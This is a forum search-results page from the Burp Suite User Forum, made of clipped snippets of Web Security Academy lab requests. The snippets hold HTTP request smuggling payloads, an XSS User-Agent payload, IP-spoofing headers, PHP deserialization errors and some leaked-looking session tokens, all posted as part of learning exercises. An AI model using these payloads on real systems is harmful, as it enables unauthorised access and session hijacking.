Burp Suite User Forum
Found 197 posts in 132 threads
responses" is given as
"POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … server was given as
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … should be like this:
"GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Content-Length: 146
x=POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
HTTP/1.1 Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net Content-Type: application/x-www-form-urlencoded … Content-Length: 272 Transfer-Encoding: chunked 0 POST /post/comment HTTP/1.1 Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: ac201f5c1e42e752809e2e6200c0001f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 272
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Symfony Version: 4.3.6
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
Thanks
POST / HTTP/1.1
Host: my host.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 4
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: 0a9900df035bbae8c07d5a7d0077009b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 105
Transfer-Encoding: chunked
5e
POST /404 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
i sent:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
p9a5ei0x99qi74vejsq36czp0tn1z3d6, xlbjcoe8ecul6sfmtdrt5cm8qqr6o7hx]) Invalid access token for user carlos in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
HTTP/1.1
Host: ac451f7f1e1dd31780a427f50095008e.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
portwigger:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
POST /dz588q90/xhr/api/v2/collector/beacon HTTP/1.1
Host: www.---------.com
Origin: http://example.com … : */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Content-Length: 1410
Origin: https://www.--------.com
Connection: close
Referer: https://www.realself.com
The URL is http://burp/ - there's no www.
receiving this error:
PHP Fatal error: Uncaught Exception: Signature does not match session in /var/www … /index.php:7 Stack trace: #0 {main} thrown in /var/www/index.php on line 7
My secret key: f99oqo0667s8noe1clqktoa99mnzvuq2
3 directory or 4 directory under root directory eg image(218.png) can we present in directory /var/www … /image/218.png or /var/www/image/abc/218.png, How we get to know this for applying Directory traversal
HTTP/1.1
Host: ac201fbc1fd627ddc0effe2300f200de.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … username=carlos HTTP/1.1
X-ayZFvQ-Ip: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length
error
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
access token for user administrator in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
Invalid access token for user administrator in Command line code:7 Stack trace: #0 {main} thrown in /var/www
74%39
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
??
this error:
Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4
Then, what I did is:
Modifying serialized objects"
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
echo "O:4:"User":2
provided is:
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
0, which is the size of the next chunk in bytes):
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
burp request ..Internal Server Error PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:5 Stack trace: #0 {main} thrown in /var/www/index.php on line 5
HTTP/1.1
Host: ac821ff91fa6a6ac80911ed1005d00ec.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … 1.1
Host:
aca71f681fe0a61c80c01e0d01930066.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acaf1f911ef7cfe6801f0c0400ef00b5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ace11f511e3acff980030cc4010500fe.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac7a1f911ef7995e80d3ec5300020083.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-acab1f4f1e8899f38092ec9101ef005c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: acfb1ff41fc0eb70c03ba87e008c000d.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Host: exploit-ac6a1f321fcaeb3dc0f4a8cc013d002c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Please see below:
POST / HTTP/1.1
Host: <lab-ID>.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a4200c60375b196c058f06300d100b9.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
response when i sent this request
POST / HTTP/1.1
Host: my lab id
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a3a008503e2d7a7c03e1b91006c0030.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0abd00da04a3b710c0c4a56b002200b3.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac6d1fc91e74b3a4808926fc009c005a.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
the lab
POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 256
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac4f1f451ed62abd80777fe600120062.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-Length: 277
Transfer-Encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
However since the simulated user and the exploit server are probably on the same network the "www" part … Removing the "www" part did the trick. Thx for your concern.
HTTP/1.1
Host: 0a7600cc04f7bab6802e1c2500f700ad.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Connection: keep-alive
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
com.host1.www
com.host1.www1
com.net2.www
even though the hostnames are actually displayed as expected
I'll past the request:
POST / HTTP/1.1
Host: victimhost
Content-Type: application/x-www-form-urlencoded … postId=1 HTTP/1.1
Host: exploitserver
Content-Type: application/x-www-form-urlencoded
Content-Length
Here is what is shown in the Site map window right above (list of all URLs):
https://www. … id=WEB87431-20150616190 HTTP/1.1
Same with:
https://www._something_ com/ - GET - /bp_chart.php?
Exploit:
```
POST / HTTP/1.1
Host: my-lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … postId=5 HTTP/1.1
User-Agent: a"/><script>alert(1)</script>
Content-Type: application/x-www-form-urlencoded
vulnerabilities:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
0a5900b7040dfb4fc1db8f1c005d0093.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … HTTP/2
Host: 0a77006f03accff4c0f8bd7500440032.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0ac800a704bbd7328148caab006b0005.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Transfer-encoding: cow
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
acc91f4d1faf6485c0b70322000b009b.web-security-academy.net
Cookie: session=bWpx0z3BW0qJhvBVGo9kof3BBkwpv3qU
Content-Type: application/x-www-form-urlencoded … Transfer-encoding: chunked
0
POST /post/comment HTTP/1.1
Content-Length: 600
Content-Type: application/x-www-form-urlencoded
reads as below:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … supposed to be:
0
POST /login HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
Technical_notes/Add_a_second_IP_address_to_an_existing_network_adapter_on_Windows and "Linux":https://www
PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1
And I am unable to log in, therefore no request … https://0ad70019033a57a1c05c334c004d0082.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded … is-warning>PHP Warning: require_once(User.php): failed to open stream: No such file or directory in /var/www … :/usr/share/php') in /var/www/index.php on line 1</p>
</div>
</section
HTTP/1.1
Host: aca11fb21f25e1e3803a19b400f90012.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Content-length: 4
Transfer-Encoding: chunked
60
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded … POST /admin HTTP/1.1 -> 20 characters + 2 ending \r\n (22 characters)
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5f
POST /admin HTTP/1.1
Content-Type: application/x-www-form-urlencoded
/my_profile;jsessionid=560423289919l0e2g6f88f71qjg4xp1z2uwc408389.5604232899 HTTP/1.1
Host: www..... … Connection: close
Content-Length: 3002
X-Single-Page-Navigation: true
Origin: https://www.....
https://www.?elp.com
like Gecko) Chrome/88.0.4324.150 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded … keep-alive
96
GET /404 HTTP/1.1
X: x=1&q=smugging&x=
Host: example.com
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: ac4f1f861e1580afc0ad62b3000a0048.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
Content-Length: 251
0
POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
this -
Internal Server Error
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4 Stack trace: #0 {main} thrown in /var/www/index.php on line 4.
: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded
: 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded … : 33
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: */*
Content-Type: application/x-www-form-urlencoded
As such, it is recommended to set the header as X-XSS-Protection: 0"
Reference https://owasp.org/www-project-secure-headers
for example :
POST /search HTTP/1.1
Host: normal-website.com
Content-Type: application/x-www-form-urlencoded
The Content-Type is: application/x-www-form-urlencoded
.*\.example\.com\/*
test\.net\/path\/here\/*
www\.test\.net\/*
-----------
7f2f9e055a74df967116223c431c9ffc=qub7j1cc8bi084gvtd3p2b1q84
Connection: close
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: 0a90006303d9bbc387c5700800820036.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
0a3500f90359495b811ec02e002700bc.web-security-academy.net\r\n
Connection: keep-alive\r\n
Content-Type: application/x-www-form-urlencoded
0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded … 0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded … https://acc21fb41ee34de080e60e9f005f0050.web-security-academy.net/email
Content-Type: application/x-www-form-urlencoded
Hi,
It looks like you are trying to achieve what is described in the articles below:
- https://www
HTTP/1.1
Host: 0a120052048d10f0c0b07c7700c300bb.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
solution :
POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length
username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length
HTTP/2
Host: 0a6f004904bb0b7282f5067100c70057.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
X-CSRFToken: I7qjj8Iz3XwEEwu2gL4ZcePHMdNjOUD6
Content-Type: application/x-www-form-urlencoded … Connection: close
X-Forwarded-For: 127.0.0.1
Notice the change to "Content-Type: application/x-www-form-urlencoded
Connection: keep-alive
Content-Length: 10
Transer-Encoding: chunked
Content-Type: application/x-www-form-urlencoded
0ac000af04eed935c3233d650017001f.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
burp-suite-explain-dom-based-open-redirection
- https://portswigger.net/support/using-burp-to-test-for-open-redirections
- https://owasp.org/www-pdf-archive
Every time I send
POST / HTTP/1.1
Host: ID.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
br
X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb
X-Instagram-AJAX: 1
Content-Type: application/x-www-form-urlencoded … br
X-CSRFToken: up5GX5XUvL5cQnTrHa4Z5DrBnaHeJyWb
X-Instagram-AJAX: 1
Content-Type: application/x-www-form-urlencoded
script>alert(1)</script>
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded … http://127.0.0.1/a.php
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
of the video I get this error :
PHP Fatal error: Uncaught Exception: unserialize() failed in /var/www … /index.php:4
Stack trace:
#0 {main}
thrown in /var/www/index.php on line 4
I understand that
HTTP/1.1
Host: ac2f1f0e1ea3d02180733e8600de008b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Directory/path traversal vulnerabilities do not usually take this into account:
- https://owasp.org/www-community
certbot certonly --webroot -w /var/www/bc.mydomain -d bc.mydomain
I get:
Invalid response from http
KHTML, like Gecko) Version/4.0 Chrome/75.0.3770.143 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded … KHTML, like Gecko) Version/4.0 Chrome/75.0.3770.143 Mobile Safari/537.36
Content-Type: application/x-www-form-urlencoded
redirected to the secure version so that's not exactly helpful), and oftentimes, subdomains other than www
HTTP/1.1
Host: ac921f9e1e43510980d00f8c0079000b.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
<FORM NAME="AUTOSUBMIT" METHOD="POST" ENCTYPE="application/x-www-form-urlencoded" ACTION="https://...
Connection: keep-alive
Transfer-Encoding: chunked
5b
GLOOL / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Add an entry, protocol 'Any', Host or IP range '^www\.google\.com$', leave the rest blank
3.
module=login&method=loginForm
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie
module=login&method=loginForm
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
Cookie
1.1
Host: yourclientid.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
req
POST / HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
browse to the URL www.sapo.pt
In the scope I have reg exp with:
Protocol: HTTP
Host or IP: ^www
further investigation it appears to be a result of Burp rewriting the content type from 'application/x-www-form-urlencoded
<form id="my_form" action="/post/comment" method="POST" enctype="application/x-www-form-urlencoded">
HTTP/1.1
Host: ac231f491feb99a4807c00a50038000f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded … HTTP/1.1
Host: ac231f491feb99a4807c00a50038000f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://testphp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
POST / HTTP/1.1
Host: xxx-your-lab-id-xxx.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
0
Upgrade-Insecure-Requests: 1
Origin: https://www.kkkkkkkk.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Origin: https://asdsdasdasd.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
sXXX0T-HXXXxb-FXXXH_cfXXX6-KHXXXX81&cbcxt=&username=USER%40ENTERPRISE_OFFICE_DOMAIN.com&mkt=&lc=
with a www-form-urlencoded … ENTERPRISE_OFFICE_DOMAIN.com
mkt
lc
This is followed by a POST to ttps://login.microsoftonline.com/login.srf
with www-form-urlencoded
a GET request:
POST /search HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded … Transfer-Encoding: chunked
7c
GET /404 HTTP/1.1
Host: vulnerable-website.com
Content-Type: application/x-www-form-urlencoded
fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
103.0.5060.134 Safari/537.36, Connection: close, Cache-Control: max-age=0, Content-Type: application/x-www-form-urlencoded
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded … Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
id=wiener
Content-Type: application/x-www-form-urlencoded
Content-Length: 117
Connection: close
Cookie
=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
https://acaf1f021f283a268092b4c2004c008d.web-security-academy.net/login
Content-Type: application/x-www-form-urlencoded
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
like Gecko) Chrome/84.0.4147.125 Safari/537.36
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
BurpSuite by attacking a local instance of WebGoat (intentionally-vulnerable web app at https://owasp.org/www-project-webgoat
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
cookie values are set here
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
connect to the site, you're redirected to the BIG-IP's proxied.site.com/my.policy page, which wants Basic WWW
Origin: https://ace11f691fef2ad580c703dd004a00c5.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
Origin: https://um-auth-qa.auth.eu-west-1.amazoncognito.com
Content-Type: application/x-www-form-urlencoded
Origin: https://0a3100a703b733a780cdd52400fa00cc.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded … oc6ENALO7RzoOG4gf7nO3WuACjtMcBsv
Sec-WebSocket-Key: BFiL8g7xBMXsqpxcyoIZxg==
Content-Type: application/x-www-form-urlencoded
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.105 Safari/537.36
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
Host: {BURP_LAB}.web-security-academy.net
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8000/
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded … Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
request that looks like this:
POST /something HTTP/1.1
Host: whatever
Content-type: application/x-www-form-urlencoded
=0
Origin: https://test2.tstraining.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 203.0.113.8 <---- INSERT HERE AND REMOVE THIS COMMENT
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://example.com
Content-Type: application/x-www-form-urlencoded
DEADBEEF6B690E7B865A46CDDEADBEEF.aa_bbb_1_cc_0
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
packet:
OST /tracker-api/tracker/trackerLog HTTP/1.1
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Content-Length: 332
Content-Type: application/x-www-form-urlencoded
Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
+ '/login'
urlForTokenPage = url + '/login2'
headerObj = {
"Content-Type": "application/x-www-form-urlencoded
13
Cookie: session=aDJvRrAxYrf804mh6rJzMmjl2195R7IN
Connection: close
Content-Type: application/x-www-form-urlencoded
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: https://example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://0a49005803315b4185f35e92000600e2.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
r140961 (Qt5.6.3)
OWASP BWA = Latest available from Sourceforge, links are in the book and a quick WWW
Origin: https://aca81fc11fb90044c029b70c00d3002f.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Signature does not match session in Command line code:7
Stack trace:
#0 {main}
thrown in /var/www
v --location 'http://<burp_vm IP>:<SparkyPort>/sparky/report' --header 'Content-Type: application/x-www-form-urlencoded
},
{
"name": "Content-Type",
"value": "application/x-www-form-urlencoded … [],
"headersSize": 746,
"postData": {
"mimeType": "application/x-www-form-urlencoded
Origin: https://ac921f4f1ec67a2fc05d23890023008c.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
content-type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded